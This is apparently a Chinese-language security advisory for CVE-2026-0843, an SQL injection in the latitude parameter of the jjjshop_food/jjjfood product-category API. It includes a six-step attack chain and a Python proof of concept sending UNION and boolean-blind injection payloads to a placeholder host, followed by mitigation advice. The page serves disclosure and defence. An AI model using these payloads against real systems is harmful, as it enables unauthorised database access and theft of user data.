CVE-2026-0843 jjjshop_food产品product.category.index接口SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-0843

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

jjjfood, jjjshop_food

漏洞概述

CVE-2026-0843是一个存在于jjjshop_food（及jjjfood）系统中的SQL注入漏洞。该漏洞存在于/index.php/api/product.category/index接口中，攻击者可通过操纵latitude参数进行SQL注入攻击。此漏洞影响2026年1月3日之前的jjjfood和jjjshop_food版本。由于该漏洞的利用代码已公开披露，攻击者无需高级技术能力即可发起攻击。漏洞允许远程攻击者在低权限情况下利用，对系统的机密性、完整性和可用性造成低至中等程度的影响。攻击者可通过构造恶意的SQL语句，读取、修改或删除数据库中的敏感信息，甚至可能在某些配置下执行系统命令。鉴于该漏洞已被公开披露且厂商未作出响应，建议受影响的用户立即采取防护措施。

技术细节

该SQL注入漏洞位于jjjshop_food系统的产品分类API接口中。具体来说，漏洞出现在/api/product.category/index端点，该接口在处理latitude参数时未进行充分的输入验证和SQL语句参数化。攻击者可以通过在latitude参数中注入恶意构造的SQL语句片段，实现未授权的数据库操作。由于CVSS评分显示攻击复杂度为低（AC:L），且不需要高权限（PR:L），攻击者只需拥有基本的用户账号即可发起攻击。攻击者可利用UNION SELECT、布尔盲注或时间盲注等技术从数据库中提取敏感信息，包括用户凭证、订单数据、商业机密等。该漏洞的影响范围包括机密性（C:L）、完整性（I:L）和可用性（A:L）三个维度均为低影响。攻击向量为网络远程（AV:N），无需用户交互（UI:N）。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的jjjshop_food或jjjfood系统，并定位/api/product.category/index接口

STEP 2

步骤2

漏洞探测：攻击者使用SQL注入测试payload（如单引号、UNION SELECT等）验证latitude参数是否存在SQL注入漏洞

STEP 3

步骤3

信息收集：利用SQL注入获取数据库结构、表名、字段名等元数据，识别敏感数据存储位置

STEP 4

步骤4

数据提取：通过构造恶意的SQL查询语句，使用UNION注入或盲注技术提取用户名、密码、订单等敏感信息

STEP 5

步骤5

权限提升：若获取的管理员凭证，可登录后台系统进一步控制整个应用服务器

STEP 6

步骤6

持久化控制：在数据库中植入后门或修改应用逻辑，实现长期访问和控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-0843 SQL Injection PoC
# Target: jjjshop_food /jjjfood product.category.index API

target_url = "http://target.com/index.php/api/product.category/index"

# Basic SQL Injection test payload
payload = {
    "latitude": "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -",
    "longitude": "1"
}

# Boolean-based blind SQL injection
blind_payload_true = {
    "latitude": "1' AND 1=1-- -",
    "longitude": "1"
}

blind_payload_false = {
    "latitude": "1' AND 1=2-- -",
    "longitude": "1"
}

def test_sql_injection(url, payload):
    try:
        response = requests.post(url, data=payload, timeout=10)
        if response.status_code == 200:
            print(f"[+] Payload sent: {payload}")
            print(f"[+] Response length: {len(response.text)}")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Execute PoC
test_sql_injection(target_url, payload)
test_sql_injection(target_url, blind_payload_true)
test_sql_injection(target_url, blind_payload_false)

影响范围

jjjfood < 20260103

jjjshop_food < 20260103

防御指南

临时缓解措施

在厂商正式发布安全更新之前，可采取以下临时缓解措施：1）使用WAF规则阻断包含SQL注入特征的请求；2）在应用层对latitude参数进行严格的输入过滤，拒绝单引号、UNION、SELECT等SQL关键字；3）限制该API接口的访问频率和来源IP；4）启用数据库审计日志，实时监控异常查询行为；5）考虑临时禁用受影响的产品分类功能模块，待官方修复后再恢复使用。